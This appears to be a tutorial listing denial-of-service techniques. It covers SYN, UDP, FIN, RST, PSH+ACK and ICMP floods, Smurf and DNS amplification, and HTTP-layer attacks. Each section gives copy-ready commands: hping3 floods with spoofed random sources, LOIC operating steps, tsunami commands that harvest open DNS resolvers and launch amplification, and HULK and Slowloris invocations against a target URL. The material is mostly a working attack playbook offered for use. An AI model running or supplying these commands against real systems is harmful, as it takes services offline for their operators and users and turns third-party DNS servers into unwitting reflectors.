Attack tools and methods hping3
Simple SYN Flood
root@kali:~# hping3 -S --flood -V -p TARGET_PORT TARGET_SITE using eth0, addr: xxx.xxx.xxx.xxx, MTU: 1500 HPING TARGET_SITE (eth0 xxx.xxx.xxx.xxx): S set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown
Advanced SYN Flood random source IP, customized data packet size, Window Size value
root@kali:~# hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE HPING TARGET_SITE (eth0 xxx.xxx.xxx.xxx): S set, 40 headers + 120 data bytes hping in flood mode, no replies will be shown –flood: sent packets as fast as possible –rand-source: random source address -c –count: packet count -d –data: data size -S –syn: set SYN flag -w –win: winsize (default 64) -p –destport: destination port (default 0)
UDP FLOOD Attack
The UDP protocol is connectionless compare to the TCP protocol. UDP Flood is a flow-based DoS attack, and the principle is straightforward. In a UDPFLOOD attack, the attacker can send a large number of small UDP packets with forged source IP addresses. Although the UDP protocol is not connected, as long as a UDP port is opened to provide related services, the related services can be attacked.
Attack Tools and Methods hping3:
root@kali:~# hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): udp mode set, 28 headers + 0 data bytes hping in flood mode, no replies will be shown –flood: sent packets as fast as possible –rand-source: random source address –udp: UDP mode -p –destport: destination port (default 0)
Attack Tools and Methods LOIC:
Low Orbit Cannon is one of the most popular DOS attack tools. It has a graphical interface, and it is easier to use.
1. Fill in the IP or domain name in the upper left corner of the text box and click Lock on to start parsing the host IP and select it as the attack target.
2. There are ports, threads, mode configuration, attack speed, etc. You can keep the default (port default is 80, thread default is 10, the fastest attack speed), but the attack mode must be your own. The three options: HTTP, TCP, and UDP.
3. Click the "IMMA CHARGIN MAH LAZER" button to start the attack, and the attack status is showed at the bottom.
TCP FIN Flood
When the client establishes a TCP connection with the server, the TCP packet with the FIN mark will be received by the server. Otherwise, it will be discarded.
If the attacker sends it to a server that has not established a TCP connection, the FIN packet will be discarded. Nevertheless, the server needs to consume resources to process it.
Since it is only necessary to construct such garbage FIN packets and send them, thus, this kind of attack is easy to launch.
Attack Tools and Methods hping3
root@kali:~# hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): F set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown -F stands for setting FIN flag
TCP RST Flood
The RST packet is used to close the TCP link forcibly.
If the attacker captures the traffic from the source to the destination address, he can forge the RST packet (using the correct source address, a destination address, source port, destination port, etc.). This RST packet can close the real connection. In the case of continuous sending, likely, a real connection cannot be established.
Attack Tools and Methods hping3 Uses -R Parameter
root@kali:~# hping3 --flood --rand-source -R -p TARGET_PORT TARGET_IP HPING TARGET_IP (eth0 TARGET_IP): R set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown
PUSH + ACK Flood
By sending a large number of packets marked PUSH and ACK simultaneously, the attacker can prevent the server from responding to legitimate requests.
Attack Tools and Methods hping3 Uses -PA Parameter
root@kali:~# hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): AP set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown -PA stands for setting PSH and ACK flags.
Attack tools and methods: LOIC can also launch this kind of attack. If you select the "TCP" attack mode, PSH+ACK flood will be executed.
ICMP and IGMP Floods
These two attack methods are like UDP Floods, which are traffic-based attacks. By sending a large number of data packets to the target, the target host can be paralyzed.
Attack tools and methods hping3 use -1
root@kali:~# hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP HPING TARGET_IP (eth0 TARGET_IP): icmp mode set, 28 headers + 0 data bytes hping in flood mode, no replies will be shown
DDOS Amplification Attack
The attacker does not directly send the communication packet to the victim, yet sends it to the amplifier and then reflects it to the victim. Utilize the characteristic that the reply packet is larger than the request packet (amplify the flow), forge the source IP address of the request packet, and direct the reply packet to the attacked target.
Amplification attacks must use a connectionless protocol that does not require verification of the source address. Common ones include Smurf attacks (ICMP amplification), DNS amplification attacks, and Fraggle attacks (UDP amplification)
The Smurf attack floods the victim host by using an ICMP reply request (ping) packet that sets the reply address to the victim network's broadcast address. Eventually, all hosts on the network respond to this ICMP reply request, resulting in network congestion. The more complicated Smurf changed the source address to the third party's victim, which eventually caused the third party to crash.
Attack Tools and Methods hping3
hping3 --icmp --spoof TARGET_IP BROADCAST_IP
DNS Amplification Attack
By using the DNS server as a springboard to amplify attack traffic, malicious attackers can send a large number of forged query requests to the DNS resolver.
Normal DNS Query:
Source IP address -----DNS query----> DNS server -----DNS reply packet----> Source IP address
Forged IP address -----DNS query----> DNS server -----DNS reply package----> Forged IP address (attack target)
This attack will cause a denial of service attack to the attacked and cause abnormal traffic to the DNS server. First, you need to collect DNS servers that provide recursive query services.
./tsunami -o recursive_dns.txt -l 4 -e 220.127.116.11/8
Afterward, execute the attack
./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt -s: the target IP address. -n: optional domain name to probe. The default is current hostname. -f : the open recursive DNS servers file for the attack. -p : number of packets to be send per DNS server. The default is 1 packet.
The Fraggle attack is a simple modification to the Smurf attack, using UDP response messages instead of ICMP
Application Layer DOS Attack
The application layer attack can also be called as the seventh layer attack. At first, a typical connection establishment request is submitted. After the connection is established, a service request will be submitted to the target server, which consumes server computing resources. Since the network layer's behavior is normal, application-layer DDoS attacks can Effectively avoid application-level detection and filtering.
The protocols that can be exploited include HTTP, HTTPS, DNS, SMTP, FTP, VOIP, and other application-layer protocols that have protocol vulnerabilities that can be used to launch attacks.
HTTP FLOOD is the most common application layer DOS attack. It is also known as CC attack (Challenge Collapsar), which simulates normal users' request behavior and is closely related to website business.
Attack tools and methods HULK (HTTP stress test tool)
root@kali:~# python hulk.py -site https://TARGET.com/test/
Attack Tools and Methods Slowloris
./slowloris.pl -dns TARGET_URL port. /slowloris.pl -dns TARGET_URL -port 80 SOCKT quantity. /slowloris.pl -dns TARGET_URL -port 80 -num 200 timeout. /slowloris.pl -dns TARGET_URL -port 80- num 200 -timeout 30 HTTPS ./slowloris.pl -dns TARGET_URL -port 443 -timeout 30 -num 200 -https